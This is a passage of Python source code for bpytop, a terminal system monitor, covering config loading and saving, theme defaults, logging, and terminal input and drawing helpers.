#* Show process memory as bytes instead of percent
proc_mem_bytes=$proc_mem_bytes
#* Check cpu temperature, needs "osx-cpu-temp" on MacOS X.
check_temp=$check_temp
#* Which sensor to use for cpu temperature, use options menu to select from list of available sensors.
cpu_sensor=$cpu_sensor
#* Show temperatures for cpu cores also if check_temp is True and sensors have been found
show_coretemp=$show_coretemp
#* Draw a clock at top of screen, formatting according to strftime, empty string to disable.
draw_clock="$draw_clock"
#* Update main ui in background when menus are showing, set this to false if the menus are flickering too much for comfort.
background_update=$background_update
#* Custom cpu model name, empty string to disable.
custom_cpu_name="$custom_cpu_name"
#* Optional filter for shown disks, should be last folder in path of a mountpoint, "root" replaces "/", separate multiple values with comma.
#* Begin line with "exclude=" to change to exclude filter, oterwise defaults to "most include" filter. Example: disks_filter="exclude=boot, home"
disks_filter="$disks_filter"
#* Show graphs instead of meters for memory values.
mem_graphs=$mem_graphs
#* If swap memory should be shown in memory box.
show_swap=$show_swap
#* Show swap as a disk, ignores show_swap value above, inserts itself after first disk.
swap_disk=$swap_disk
#* If mem box should be split to also show disks info.
show_disks=$show_disks
#* Set fixed values for network graphs, default "10M" = 10 Mebibytes, possible units "K", "M", "G", append with "bit" for bits instead of bytes, i.e. "100mbit"
net_download="$net_download"
net_upload="$net_upload"
#* Start in network graphs auto rescaling mode, ignores any values set above and rescales down to 10 Kibibytes at the lowest.
net_auto=$net_auto
#* Sync the scaling for download and upload to whichever currently has the highest scale
net_sync=$net_sync
#* If the network graphs color gradient should scale to bandwidth usage or auto scale, bandwidth usage is based on "net_download" and "net_upload" values
net_color_fixed=$net_color_fixed
#* Show battery stats in top right if battery is present
show_battery=$show_battery
#* Show init screen at startup, the init screen is purely cosmetic
show_init=$show_init
#* Enable check for new version from github.com/aristocratos/bpytop at start.
update_check=$update_check
#* Set loglevel for "~/.config/bpytop/error.log" levels are: "ERROR" "WARNING" "INFO" "DEBUG".
#* The level set includes all lower levels, i.e. "DEBUG" will show all logging info.
log_level=$log_level
''')
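# Illustrative note, not original code: DEFAULT_CONF is a string.Template, so every "$key"
# placeholder above must have a matching entry in Config.conf_dict when Config.save_config()
# writes the file, roughly:
#
#     f.write(DEFAULT_CONF.substitute(CONFIG.conf_dict))   # substitute() raises KeyError if a key is missing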
CONFIG_DIR: str = f'{os.path.expanduser("~")}/.config/bpytop'
if not os.path.isdir(CONFIG_DIR):
try:
os.makedirs(CONFIG_DIR)
os.mkdir(f'{CONFIG_DIR}/themes')
except PermissionError:
print(f'ERROR!\nNo permission to write to "{CONFIG_DIR}" directory!')
raise SystemExit(1)
CONFIG_FILE: str = f'{CONFIG_DIR}/bpytop.conf'
THEME_DIR: str = ""
if os.path.isdir(f'{os.path.dirname(__file__)}/bpytop-themes'):
THEME_DIR = f'{os.path.dirname(__file__)}/bpytop-themes'
else:
for td in ["/usr/local/", "/usr/", "/snap/bpytop/current/usr/"]:
if os.path.isdir(f'{td}share/bpytop/themes'):
THEME_DIR = f'{td}share/bpytop/themes'
break
USER_THEME_DIR: str = f'{CONFIG_DIR}/themes'
CORES: int = psutil.cpu_count(logical=False) or 1
THREADS: int = psutil.cpu_count(logical=True) or 1
THREAD_ERROR: int = 0
DEFAULT_THEME: Dict[str, str] = {
"main_bg" : "",
"main_fg" : "#cc",
"title" : "#ee",
"hi_fg" : "#969696",
"selected_bg" : "#7e2626",
"selected_fg" : "#ee",
"inactive_fg" : "#40",
"graph_text" : "#60",
"meter_bg" : "#40",
"proc_misc" : "#0de756",
"cpu_box" : "#3d7b46",
"mem_box" : "#8a882e",
"net_box" : "#423ba5",
"proc_box" : "#923535",
"div_line" : "#30",
"temp_start" : "#4897d4",
"temp_mid" : "#5474e8",
"temp_end" : "#ff40b6",
"cpu_start" : "#50f095",
"cpu_mid" : "#f2e266",
"cpu_end" : "#fa1e1e",
"free_start" : "#223014",
"free_mid" : "#b5e685",
"free_end" : "#dcff85",
"cached_start" : "#0b1a29",
"cached_mid" : "#74e6fc",
"cached_end" : "#26c5ff",
"available_start" : "#292107",
"available_mid" : "#ffd77a",
"available_end" : "#ffb814",
"used_start" : "#3b1f1c",
"used_mid" : "#d9626d",
"used_end" : "#ff4769",
"download_start" : "#231a63",
"download_mid" : "#4f43a3",
"download_end" : "#b0a9de",
"upload_start" : "#510554",
"upload_mid" : "#7d4180",
"upload_end" : "#dcafde",
"process_start" : "#80d0a3",
"process_mid" : "#dcd179",
"process_end" : "#d45454",
}
MENUS: Dict[str, Dict[str, Tuple[str, ...]]] = {
"options" : {
"normal" : (
"┌─┐┌─┐┌┬┐┬┌─┐┌┐┌┌─┐",
"│ │├─┘ │ ││ ││││└─┐",
"└─┘┴ ┴ ┴└─┘┘└┘└─┘"),
"selected" : (
"╔═╗╔═╗╔╦╗╦╔═╗╔╗╔╔═╗",
"║ ║╠═╝ ║ ║║ ║║║║╚═╗",
"╚═╝╩ ╩ ╩╚═╝╝╚╝╚═╝") },
"help" : {
"normal" : (
"┬ ┬┌─┐┬ ┌─┐",
"├─┤├┤ │ ├─┘",
"┴ ┴└─┘┴─┘┴ "),
"selected" : (
"╦ ╦╔═╗╦ ╔═╗",
"╠═╣║╣ ║ ╠═╝",
"╩ ╩╚═╝╩═╝╩ ") },
"quit" : {
"normal" : (
"┌─┐ ┬ ┬ ┬┌┬┐",
"│─┼┐│ │ │ │ ",
"└─┘└└─┘ ┴ ┴ "),
"selected" : (
"╔═╗ ╦ ╦ ╦╔╦╗ ",
"║═╬╗║ ║ ║ ║ ",
"╚═╝╚╚═╝ ╩ ╩ ") }
}
MENU_COLORS: Dict[str, Tuple[str, ...]] = {
"normal" : ("#0fd7ff", "#00bfe6", "#00a6c7", "#008ca8"),
"selected" : ("#ffa50a", "#f09800", "#db8b00", "#c27b00")
}
#? Units for floating_humanizer function
UNITS: Dict[str, Tuple[str, ...]] = {
"bit" : ("bit", "Kib", "Mib", "Gib", "Tib", "Pib", "Eib", "Zib", "Yib", "Bib", "GEb"),
"byte" : ("Byte", "KiB", "MiB", "GiB", "TiB", "PiB", "EiB", "ZiB", "YiB", "BiB", "GEB")
}
#? Setup error logger ---------------------------------------------------------------->
try:
errlog = logging.getLogger("ErrorLogger")
errlog.setLevel(logging.DEBUG)
eh = logging.handlers.RotatingFileHandler(f'{CONFIG_DIR}/error.log', maxBytes=1048576, backupCount=4)
eh.setLevel(logging.DEBUG)
eh.setFormatter(logging.Formatter("%(asctime)s | %(levelname)s: %(message)s", datefmt="%d/%m/%y (%X)"))
errlog.addHandler(eh)
except PermissionError:
print(f'ERROR!\nNo permission to write to "{CONFIG_DIR}" directory!')
raise SystemExit(1)
#? Timers for testing and debugging -------------------------------------------------------------->
class TimeIt:
timers: Dict[str, float] = {}
paused: Dict[str, float] = {}
@classmethod
def start(cls, name):
cls.timers[name] = time()
@classmethod
def pause(cls, name):
if name in cls.timers:
cls.paused[name] = time() - cls.timers[name]
del cls.timers[name]
@classmethod
def stop(cls, name):
if name in cls.timers:
total: float = time() - cls.timers[name]
del cls.timers[name]
if name in cls.paused:
total += cls.paused[name]
del cls.paused[name]
errlog.debug(f'{name} completed in {total:.6f} seconds')
def timeit_decorator(func):
def timed(*args, **kw):
ts = time()
out = func(*args, **kw)
errlog.debug(f'{func.__name__} completed in {time() - ts:.6f} seconds')
return out
return timed
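# Illustrative usage, comment only: the debug timers above are meant to be dropped in ad hoc
# while profiling, e.g.
#
#     TimeIt.start("collect")
#     ...                       # code being measured
#     TimeIt.stop("collect")    # logs 'collect completed in N seconds' at DEBUG level
#
#     @timeit_decorator
#     def draw_clock():         # hypothetical function; every call gets its runtime logged
#         ...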
#? Set up config class and load config ----------------------------------------------------------->
class Config:
'''Holds all config variables and functions for loading from and saving to disk'''
keys: List[str] = ["color_theme", "update_ms", "proc_sorting", "proc_reversed", "proc_tree", "check_temp", "draw_clock", "background_update", "custom_cpu_name",
"proc_colors", "proc_gradient", "proc_per_core", "proc_mem_bytes", "disks_filter", "update_check", "log_level", "mem_graphs", "show_swap",
"swap_disk", "show_disks", "net_download", "net_upload", "net_auto", "net_color_fixed", "show_init", "view_mode", "theme_background",
"net_sync", "show_battery", "tree_depth", "cpu_sensor", "show_coretemp"]
conf_dict: Dict[str, Union[str, int, bool]] = {}
color_theme: str = "Default"
theme_background: bool = True
update_ms: int = 2000
proc_sorting: str = "cpu lazy"
proc_reversed: bool = False
proc_tree: bool = False
tree_depth: int = 3
proc_colors: bool = True
proc_gradient: bool = True
proc_per_core: bool = False
proc_mem_bytes: bool = True
check_temp: bool = True
cpu_sensor: str = "Auto"
show_coretemp: bool = True
draw_clock: str = "%X"
background_update: bool = True
custom_cpu_name: str = ""
disks_filter: str = ""
update_check: bool = True
mem_graphs: bool = True
show_swap: bool = True
swap_disk: bool = True
show_disks: bool = True
net_download: str = "10M"
net_upload: str = "10M"
net_color_fixed: bool = False
net_auto: bool = True
net_sync: bool = False
show_battery: bool = True
show_init: bool = True
view_mode: str = "full"
log_level: str = "WARNING"
warnings: List[str] = []
info: List[str] = []
sorting_options: List[str] = ["pid", "program", "arguments", "threads", "user", "memory", "cpu lazy", "cpu responsive"]
log_levels: List[str] = ["ERROR", "WARNING", "INFO", "DEBUG"]
view_modes: List[str] = ["full", "proc", "stat"]
cpu_sensors: List[str] = [ "Auto" ]
if hasattr(psutil, "sensors_temperatures"):
try:
_temps = psutil.sensors_temperatures()
if _temps:
for _name, _entries in _temps.items():
for _num, _entry in enumerate(_entries, 1):
if hasattr(_entry, "current"):
cpu_sensors.append(f'{_name}:{_num if _entry.label == "" else _entry.label}')
except:
pass
changed: bool = False
recreate: bool = False
config_file: str = ""
_initialized: bool = False
def __init__(self, path: str):
self.config_file = path
conf: Dict[str, Union[str, int, bool]] = self.load_config()
if not "version" in conf.keys():
self.recreate = True
self.info.append(f'Config file malformed or missing, will be recreated on exit!')
elif conf["version"] != VERSION:
self.recreate = True
self.info.append(f'Config file version and bpytop version mismatch, will be recreated on exit!')
for key in self.keys:
if key in conf.keys() and conf[key] != "_error_":
setattr(self, key, conf[key])
else:
self.recreate = True
self.conf_dict[key] = getattr(self, key)
self._initialized = True
def __setattr__(self, name, value):
if self._initialized:
object.__setattr__(self, "changed", True)
object.__setattr__(self, name, value)
if name not in ["_initialized", "recreate", "changed"]:
self.conf_dict[name] = value
def load_config(self) -> Dict[str, Union[str, int, bool]]:
'''Load config from file, set correct types for values and return a dict'''
new_config: Dict[str,Union[str, int, bool]] = {}
conf_file: str = ""
if os.path.isfile(self.config_file):
conf_file = self.config_file
elif os.path.isfile("/etc/bpytop.conf"):
conf_file = "/etc/bpytop.conf"
else:
return new_config
try:
with open(conf_file, "r") as f:
for line in f:
line = line.strip()
if line.startswith("#? Config"):
new_config["version"] = line[line.find("v. ") + 3:]
for key in self.keys:
if line.startswith(key):
line = line.replace(key + "=", "")
if line.startswith('"'):
line = line.strip('"')
if type(getattr(self, key)) == int:
try:
new_config[key] = int(line)
except ValueError:
self.warnings.append(f'Config key "{key}" should be an integer!')
if type(getattr(self, key)) == bool:
try:
new_config[key] = bool(strtobool(line))
except ValueError:
self.warnings.append(f'Config key "{key}" can only be True or False!')
if type(getattr(self, key)) == str:
new_config[key] = str(line)
except Exception as e:
errlog.exception(str(e))
if "proc_sorting" in new_config and not new_config["proc_sorting"] in self.sorting_options:
new_config["proc_sorting"] = "_error_"
self.warnings.append(f'Config key "proc_sorted" didn\'t get an acceptable value!')
if "log_level" in new_config and not new_config["log_level"] in self.log_levels:
new_config["log_level"] = "_error_"
self.warnings.append(f'Config key "log_level" didn\'t get an acceptable value!')
if "view_mode" in new_config and not new_config["view_mode"] in self.view_modes:
new_config["view_mode"] = "_error_"
self.warnings.append(f'Config key "view_mode" didn\'t get an acceptable value!')
if isinstance(new_config["update_ms"], int) and new_config["update_ms"] < 100:
new_config["update_ms"] = 100
self.warnings.append(f'Config key "update_ms" can\'t be lower than 100!')
for net_name in ["net_download", "net_upload"]:
if net_name in new_config and not new_config[net_name][0].isdigit(): # type: ignore
new_config[net_name] = "_error_"
if "cpu_sensor" in new_config and not new_config["cpu_sensor"] in self.cpu_sensors:
new_config["cpu_sensor"] = "_error_"
self.warnings.append(f'Config key "cpu_sensor" does not contain an available sensor!')
return new_config
def save_config(self):
'''Save current config to config file if difference in values or version, creates a new file if not found'''
if not self.changed and not self.recreate: return
try:
with open(self.config_file, "w" if os.path.isfile(self.config_file) else "x") as f:
f.write(DEFAULT_CONF.substitute(self.conf_dict))
except Exception as e:
errlog.exception(str(e))
try:
CONFIG: Config = Config(CONFIG_FILE)
if DEBUG:
errlog.setLevel(logging.DEBUG)
else:
errlog.setLevel(getattr(logging, CONFIG.log_level))
DEBUG = CONFIG.log_level == "DEBUG"
errlog.info(f'New instance of bpytop version {VERSION} started with pid {os.getpid()}')
errlog.info(f'Loglevel set to {"DEBUG" if DEBUG else CONFIG.log_level}')
errlog.debug(f'Using psutil version {".".join(str(x) for x in psutil.version_info)}')
errlog.debug(f'CMD: {" ".join(sys.argv)}')
if CONFIG.info:
for info in CONFIG.info:
errlog.info(info)
CONFIG.info = []
if CONFIG.warnings:
for warning in CONFIG.warnings:
errlog.warning(warning)
CONFIG.warnings = []
except Exception as e:
errlog.exception(f'{e}')
raise SystemExit(1)
if psutil.version_info[0] < 5 or (psutil.version_info[0] == 5 and psutil.version_info[1] < 7):
warn = f'psutil version {".".join(str(x) for x in psutil.version_info)} detected, version 5.7.0 or later required for full functionality!'
print("WARNING!", warn)
errlog.warning(warn)
#? Classes --------------------------------------------------------------------------------------->
class Term:
"""Terminal info and commands"""
width: int = 0
height: int = 0
resized: bool = False
_w : int = 0
_h : int = 0
fg: str = "" #* Default foreground color
bg: str = "" #* Default background color
hide_cursor = "\033[?25l" #* Hide terminal cursor
show_cursor = "\033[?25h" #* Show terminal cursor
alt_screen = "\033[?1049h" #* Switch to alternate screen
normal_screen = "\033[?1049l" #* Switch to normal screen
clear = "\033[2J\033[0;0f" #* Clear screen and set cursor to position 0,0
mouse_on = "\033[?1002h\033[?1015h\033[?1006h" #* Enable reporting of mouse position on click and release
mouse_off = "\033[?1002l" #* Disable mouse reporting
mouse_direct_on = "\033[?1003h" #* Enable reporting of mouse position at any movement
mouse_direct_off = "\033[?1003l" #* Disable direct mouse reporting
winch = threading.Event()
@classmethod
def refresh(cls, *args, force: bool = False):
"""Update width, height and set resized flag if terminal has been resized"""
if cls.resized: cls.winch.set(); return
cls._w, cls._h = os.get_terminal_size()
if (cls._w, cls._h) == (cls.width, cls.height) and not force: return
if force: Collector.collect_interrupt = True
while (cls._w, cls._h) != (cls.width, cls.height) or (cls._w < 80 or cls._h < 24):
if Init.running: Init.resized = True
CpuBox.clock_block = True
cls.resized = True
Collector.collect_interrupt = True
cls.width, cls.height = cls._w, cls._h
Draw.now(Term.clear)
Draw.now(f'{create_box(cls._w // 2 - 25, cls._h // 2 - 2, 50, 3, "resizing", line_color=Colors.green, title_color=Colors.white)}',
f'{Mv.r(12)}{Colors.default}{Colors.black_bg}{Fx.b}Width : {cls._w} Height: {cls._h}{Fx.ub}{Term.bg}{Term.fg}')
if cls._w < 80 or cls._h < 24:
while cls._w < 80 or cls._h < 24:
Draw.now(Term.clear)
Draw.now(f'{create_box(cls._w // 2 - 25, cls._h // 2 - 2, 50, 4, "warning", line_color=Colors.red, title_color=Colors.white)}',
f'{Mv.r(12)}{Colors.default}{Colors.black_bg}{Fx.b}Width: {Colors.red if cls._w < 80 else Colors.green}{cls._w} ',
f'{Colors.default}Height: {Colors.red if cls._h < 24 else Colors.green}{cls._h}{Term.bg}{Term.fg}',
f'{Mv.to(cls._h // 2, cls._w // 2 - 23)}{Colors.default}{Colors.black_bg}Width and Height needs to be at least 80 x 24 !{Fx.ub}{Term.bg}{Term.fg}')
cls.winch.wait(0.3)
cls.winch.clear()
cls._w, cls._h = os.get_terminal_size()
else:
cls.winch.wait(0.3)
cls.winch.clear()
cls._w, cls._h = os.get_terminal_size()
Key.mouse = {}
Box.calc_sizes()
if Init.running: cls.resized = False; return
if Menu.active: Menu.resized = True
Box.draw_bg(now=False)
cls.resized = False
Timer.finish()
@staticmethod
def echo(on: bool):
"""Toggle input echo"""
(iflag, oflag, cflag, lflag, ispeed, ospeed, cc) = termios.tcgetattr(sys.stdin.fileno())
if on:
lflag |= termios.ECHO # type: ignore
else:
lflag &= ~termios.ECHO # type: ignore
new_attr = [iflag, oflag, cflag, lflag, ispeed, ospeed, cc]
termios.tcsetattr(sys.stdin.fileno(), termios.TCSANOW, new_attr)
@staticmethod
def title(text: str = "") -> str:
out: str = f'{os.environ.get("TERMINAL_TITLE", "")}'
if out and text: out += " "
if text: out += f'{text}'
return f'\033]0;{out}\a'
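# Illustrative usage, comment only: the escape strings above are written directly to the
# terminal. The real call sites live further down in the program, but startup/shutdown looks
# roughly like:
#
#     Draw.now(Term.alt_screen, Term.clear, Term.hide_cursor, Term.mouse_on, Term.title("BpyTOP"))
#     ...
#     Draw.now(Term.clear, Term.normal_screen, Term.show_cursor, Term.mouse_off, Term.title())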
class Fx:
"""Text effects
* trans(string: str) : Replace whitespace with a cursor-right escape so the background behind the whitespace is not overwritten.
* uncolor(string: str) : Removes all 24-bit color escape sequences and returns the string."""
start = "\033[" #* Escape sequence start
sep = ";" #* Escape sequence separator
end = "m" #* Escape sequence end
reset = rs = "\033[0m" #* Reset foreground/background color and text effects
bold = b = "\033[1m" #* Bold on
unbold = ub = "\033[22m" #* Bold off
dark = d = "\033[2m" #* Dark on
undark = ud = "\033[22m" #* Dark off
italic = i = "\033[3m" #* Italic on
unitalic = ui = "\033[23m" #* Italic off
underline = u = "\033[4m" #* Underline on
ununderline = uu = "\033[24m" #* Underline off
blink = bl = "\033[5m" #* Blink on
unblink = ubl = "\033[25m" #* Blink off
strike = s = "\033[9m" #* Strike / crossed-out on
unstrike = us = "\033[29m" #* Strike / crossed-out off
#* Precompiled regex for finding a 24-bit color escape sequence in a string
color_re = re.compile(r"\033\[\d+;\d?;?\d*;?\d*;?\d*m")
@staticmethod
def trans(string: str):
return string.replace(" ", "\033[1C")
@classmethod
def uncolor(cls, string: str) -> str:
return f'{cls.color_re.sub("", string)}'
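# Illustrative usage, comment only:
#
#     print(f'{Fx.b}bold{Fx.ub} and {Fx.u}underlined{Fx.uu}')
#     Fx.uncolor("\033[38;2;200;0;0mred text")   # -> "red text", 24-bit color code stripped
#     Fx.trans("a b")                            # -> "a\033[1Cb", keeps background behind the gap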
class Raw(object):
"""Set raw input mode for device"""
def __init__(self, stream):
self.stream = stream
self.fd = self.stream.fileno()
def __enter__(self):
self.original_stty = termios.tcgetattr(self.stream)
tty.setcbreak(self.stream)
def __exit__(self, type, value, traceback):
termios.tcsetattr(self.stream, termios.TCSANOW, self.original_stty)
class Nonblocking(object):
"""Set nonblocking mode for device"""
def __init__(self, stream):
self.stream = stream
self.fd = self.stream.fileno()
def __enter__(self):
self.orig_fl = fcntl.fcntl(self.fd, fcntl.F_GETFL)
fcntl.fcntl(self.fd, fcntl.F_SETFL, self.orig_fl | os.O_NONBLOCK)
def __exit__(self, *args):
fcntl.fcntl(self.fd, fcntl.F_SETFL, self.orig_fl)
class Mv:
"""Class with collection of cursor movement functions: .t[o](line, column) | .r[ight](columns) | .l[eft](columns) | .u[p](lines) | .d[own](lines) | .save() | .restore()"""
@staticmethod
def to(line: int, col: int) -> str:
return f'\033[{line};{col}f' #* Move cursor to line, column
@staticmethod
def right(x: int) -> str: #* Move cursor right x columns
return f'\033[{x}C'
@staticmethod
def left(x: int) -> str: #* Move cursor left x columns
return f'\033[{x}D'
@staticmethod
def up(x: int) -> str: #* Move cursor up x lines
return f'\033[{x}A'
@staticmethod
def down(x: int) -> str: #* Move cursor down x lines
return f'\033[{x}B'
save: str = "\033[s" #* Save cursor position
restore: str = "\033[u" #* Restore saved cursor position
t = to
r = right
l = left
u = up
d = down
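# Illustrative usage, comment only: each helper returns an ANSI escape string, so movements
# can be concatenated freely, e.g.
#
#     Draw.now(Mv.to(1, 1), "top-left", Mv.d(2), Mv.l(8), "two rows lower")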
class Key:
"""Handles the threaded input reader for keypresses and mouse events"""
list: List[str] = []
mouse: Dict[str, List[List[int]]] = {}
mouse_pos: Tuple[int, int] = (0, 0)
escape: Dict[Union[str, Tuple[str, str]], str] = {
"\n" : "enter",
("\x7f", "\x08") : "backspace",
("[A", "OA") : "up",
("[B", "OB") : "down",
("[D", "OD") : "left",
("[C", "OC") : "right",
"[2~" : "insert",
"[3~" : "delete",
"[H" : "home",
"[F" : "end",
"[5~" : "page_up",
"[6~" : "page_down",
"\t" : "tab",
"[Z" : "shift_tab",
"OP" : "f1",
"OQ" : "f2",
"OR" : "f3",
"OS" : "f4",
"[15" : "f5",
"[17" : "f6",
"[18" : "f7",
"[19" : "f8",
"[20" : "f9",
"[21" : "f10",
"[23" : "f11",
"[24" : "f12"
}
new = threading.Event()
idle = threading.Event()
mouse_move = threading.Event()
mouse_report: bool = False
idle.set()
stopping: bool = False
started: bool = False
reader: threading.Thread
@classmethod
def start(cls):
cls.stopping = False
cls.reader = threading.Thread(target=cls._get_key)
cls.reader.start()
cls.started = True
@classmethod
def stop(cls):
if cls.started and cls.reader.is_alive():
cls.stopping = True
try:
cls.reader.join()
except:
pass
@classmethod
def last(cls) -> str:
if cls.list: return cls.list.pop()
else: return ""
@classmethod
def get(cls) -> str:
if cls.list: return cls.list.pop(0)
else: return ""
@classmethod
def get_mouse(cls) -> Tuple[int, int]:
if cls.new.is_set():
cls.new.clear()
return cls.mouse_pos
@classmethod
def mouse_moved(cls) -> bool:
if cls.mouse_move.is_set():
cls.mouse_move.clear()
return True
else:
return False
@classmethod
def has_key(cls) -> bool:
return bool(cls.list)
@classmethod
def clear(cls):
cls.list = []
@classmethod
def input_wait(cls, sec: float = 0.0, mouse: bool = False) -> bool:
'''Returns True if key is detected else waits out timer and returns False'''
if cls.list: return True
if mouse: Draw.now(Term.mouse_direct_on)
cls.new.wait(sec if sec > 0 else 0.0)
if mouse: Draw.now(Term.mouse_direct_off, Term.mouse_on)
if cls.new.is_set():
cls.new.clear()
return True
else:
return False
@classmethod
def break_wait(cls):
cls.list.append("_null")
cls.new.set()
sleep(0.01)
cls.new.clear()
@classmethod
def _get_key(cls):
"""Get a key or escape sequence from stdin, convert to readable format and save to keys list. Meant to be run in it's own thread."""
input_key: str = ""
clean_key: str = ""
try:
while not cls.stopping:
with Raw(sys.stdin):
if not select([sys.stdin], [], [], 0.1)[0]: #* Wait 100ms for input on stdin then restart loop to check for stop flag
continue
input_key += sys.stdin.read(1) #* Read 1 key safely with blocking on
if input_key == "\033": #* If first character is a escape sequence keep reading
cls.idle.clear() #* Report IO block in progress to prevent Draw functions from getting an IO block error
Draw.idle.wait() #* Wait for Draw function to finish if busy
with Nonblocking(sys.stdin): #* Set non blocking to prevent read stall
input_key += sys.stdin.read(20)
if input_key.startswith("\033[<"):
_ = sys.stdin.read(1000)
cls.idle.set() #* Report IO blocking done
#errlog.debug(f'{repr(input_key)}')
if input_key == "\033": clean_key = "escape" #* Key is "escape" key if only containing \033
elif input_key.startswith(("\033[<0;", "\033[<35;", "\033[<64;", "\033[<65;")): #* Detected mouse event
try:
cls.mouse_pos = (int(input_key.split(";")[1]), int(input_key.split(";")[2].rstrip("mM")))
except:
pass
else:
if input_key.startswith("\033[<35;"): #* Detected mouse move in mouse direct mode
cls.mouse_move.set()
cls.new.set()
elif input_key.startswith("\033[<64;"): #* Detected mouse scroll up
clean_key = "mouse_scroll_up"
elif input_key.startswith("\033[<65;"): #* Detected mouse scroll down
clean_key = "mouse_scroll_down"
elif input_key.startswith("\033[<0;") and input_key.endswith("m"): #* Detected mouse click release
if Menu.active:
clean_key = "mouse_click"
else:
for key_name, positions in cls.mouse.items(): #* Check if mouse position is clickable
if list(cls.mouse_pos) in positions:
clean_key = key_name
break
else:
clean_key = "mouse_click"
elif input_key == "\\": clean_key = "\\" #* Clean up "\" to not return escaped
else:
for code in cls.escape.keys(): #* Go through the dict of escape codes to get the cleaned key name
if input_key.lstrip("\033").startswith(code):
clean_key = cls.escape[code]
break
else: #* If not found in escape dict and length of key is 1, assume regular character
if len(input_key) == 1:
clean_key = input_key
if clean_key:
cls.list.append(clean_key) #* Store up to 10 keys in input queue for later processing
if len(cls.list) > 10: del cls.list[0]
clean_key = ""
cls.new.set() #* Set threading event to interrupt main thread sleep
input_key = ""
except Exception as e:
errlog.exception(f'Input thread failed with exception: {e}')
cls.idle.set()
cls.list.clear()
clean_quit(1, thread=True)
class Draw:
'''Holds the draw buffer and manages IO blocking queue
* .buffer([+]name[!], *args, append=False, now=False, z=100) : Add *args to buffer
* - Adding "+" prefix to name sets append to True and appends to name's current string
* - Adding "!" suffix to name sets now to True and print name's current string
* .out(clear=False) : Print all strings in buffer, clear=True clears all buffers afterwards
* .now(*args) : Prints all arguments as a string
* .clear(*names) : Clear named buffers, all if no argument
* .last_screen() : Prints all saved buffers
'''
strings: Dict[str, str] = {}
z_order: Dict[str, int] = {}
saved: Dict[str, str] = {}
save: Dict[str, bool] = {}
once: Dict[str, bool] = {}
idle = threading.Event()
idle.set()
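#* The idle events let Draw and the Key reader take turns using the terminal, so output and escape-sequence reads never interleave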
@classmethod
def now(cls, *args):
'''Wait for input reader and self to be idle then print to screen'''
Key.idle.wait()
cls.idle.wait()
cls.idle.clear()
try:
print(*args, sep="", end="", flush=True)
except BlockingIOError:
pass
Key.idle.wait()
print(*args, sep="", end="", flush=True)
cls.idle.set()
@classmethod
def buffer(cls, name: str, *args: str, append: bool = False, now: bool = False, z: int = 100, only_save: bool = False, no_save: bool = False, once: bool = False):
string: str = ""
if name.startswith("+"):
name = name.lstrip("+")
append = True
if name.endswith("!"):
name = name.rstrip("!")
now = True
cls.save[name] = not no_save
cls.once[name] = once
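#* Lower z values are printed last by out() and therefore end up on top of buffers with higher z values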
if not name in cls.z_order or z != 100: cls.z_order[name] = z
if args: string = "".join(args)
if only_save:
if name not in cls.saved or not append: cls.saved[name] = ""
cls.saved[name] += string
else:
if name not in cls.strings or not append: cls.strings[name] = ""
cls.strings[name] += string
if now:
cls.out(name)
@classmethod
def out(cls, *names: str, clear = False):
out: str = ""
if not cls.strings: return
if names:
for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True): #type: ignore
if name in names and name in cls.strings:
out += cls.strings[name]
if cls.save[name]:
cls.saved[name] = cls.strings[name]
if clear or cls.once[name]:
cls.clear(name)
cls.now(out)
else:
for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True): #type: ignore
if name in cls.strings:
out += cls.strings[name]
if cls.save[name]:
cls.saved[name] = cls.strings[name]
if cls.once[name] and not clear:
cls.clear(name)
if clear:
cls.clear()
cls.now(out)
@classmethod
def saved_buffer(cls) -> str:
out: str = ""
for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True): #type: ignore
if name in cls.saved:
out += cls.saved[name]
return out
@classmethod
def clear(cls, *names, saved: bool = False):
if names:
for name in names:
if name in cls.strings:
del cls.strings[name]
if name in cls.save:
del cls.save[name]
if name in cls.once:
del cls.once[name]
if saved:
if name in cls.saved:
del cls.saved[name]
if name in cls.z_order:
del cls.z_order[name]
else:
cls.strings = {}
cls.save = {}
cls.once = {}
if saved:
cls.saved = {}
cls.z_order = {}
class Color:
'''Holds representations for a 24-bit color value
__init__(color, depth="fg", default=False)
-- color accepts a 6 digit hexadecimal string "#RRGGBB", a 2 digit hexadecimal string "#FF" (greyscale) or a decimal RGB string "255 255 255".
-- depth accepts "fg" or "bg"
__call__(*args) joins str arguments to a string and apply color
__str__ returns escape sequence to set color
__iter__ returns iteration over red, green and blue in integer values of 0-255.
* Values: .hexa: str | .dec: Tuple[int, int, int] | .red: int | .green: int | .blue: int | .depth: str | .escape: str
'''
hexa: str; dec: Tuple[int, int, int]; red: int; green: int; blue: int; depth: str; escape: str; default: bool
def __init__(self, color: str, depth: str = "fg", default: bool = False):
self.depth = depth
self.default = default
try:
if not color:
self.dec = (-1, -1, -1)
self.hexa = ""
self.red = self.green = self.blue = -1
self.escape = "\033[49m" if depth == "bg" and default else ""
return
elif color.startswith("#"):
self.hexa = color
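#* A 2 digit hex value like "#cc" is treated as greyscale: the same byte is used for red, green and blue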
if len(self.hexa) == 3:
self.hexa += self.hexa[1:3] + self.hexa[1:3]
c = int(self.hexa[1:3], base=16)
self.dec = (c, c, c)
elif len(self.hexa) == 7:
self.dec = (int(self.hexa[1:3], base=16), int(self.hexa[3:5], base=16), int(self.hexa[5:7], base=16))
else:
raise ValueError(f'Incorrectly formatted hexadecimal rgb string: {self.hexa}')
else:
c_t = tuple(map(int, color.split(" ")))
if len(c_t) == 3:
self.dec = c_t #type: ignore
else:
raise ValueError(f'RGB dec should be "0-255 0-255 0-255"')
ct = self.dec[0] + self.dec[1] + self.dec[2]
if ct > 255*3 or ct < 0:
raise ValueError(f'RGB values out of range: {color}')
except Exception as e:
errlog.exception(str(e))
self.escape = ""
return
if self.dec and not self.hexa: self.hexa = f'{hex(self.dec[0]).lstrip("0x").zfill(2)}{hex(self.dec[1]).lstrip("0x").zfill(2)}{hex(self.dec[2]).lstrip("0x").zfill(2)}'
if self.dec and self.hexa:
self.red, self.green, self.blue = self.dec
self.escape = f'\033[{38 if self.depth == "fg" else 48};2;{";".join(str(c) for c in self.dec)}m'
def __str__(self) -> str:
return self.escape
def __repr__(self) -> str:
return repr(self.escape)
def __iter__(self) -> Iterable:
for c in self.dec: yield c
def __call__(self, *args: str) -> str:
if len(args) < 1: return ""
return f'{self.escape}{"".join(args)}{getattr(Term, self.depth)}'
@staticmethod
def escape_color(hexa: str = "", r: int = 0, g: int = 0, b: int = 0, depth: str = "fg") -> str:
"""Returns escape sequence to set color
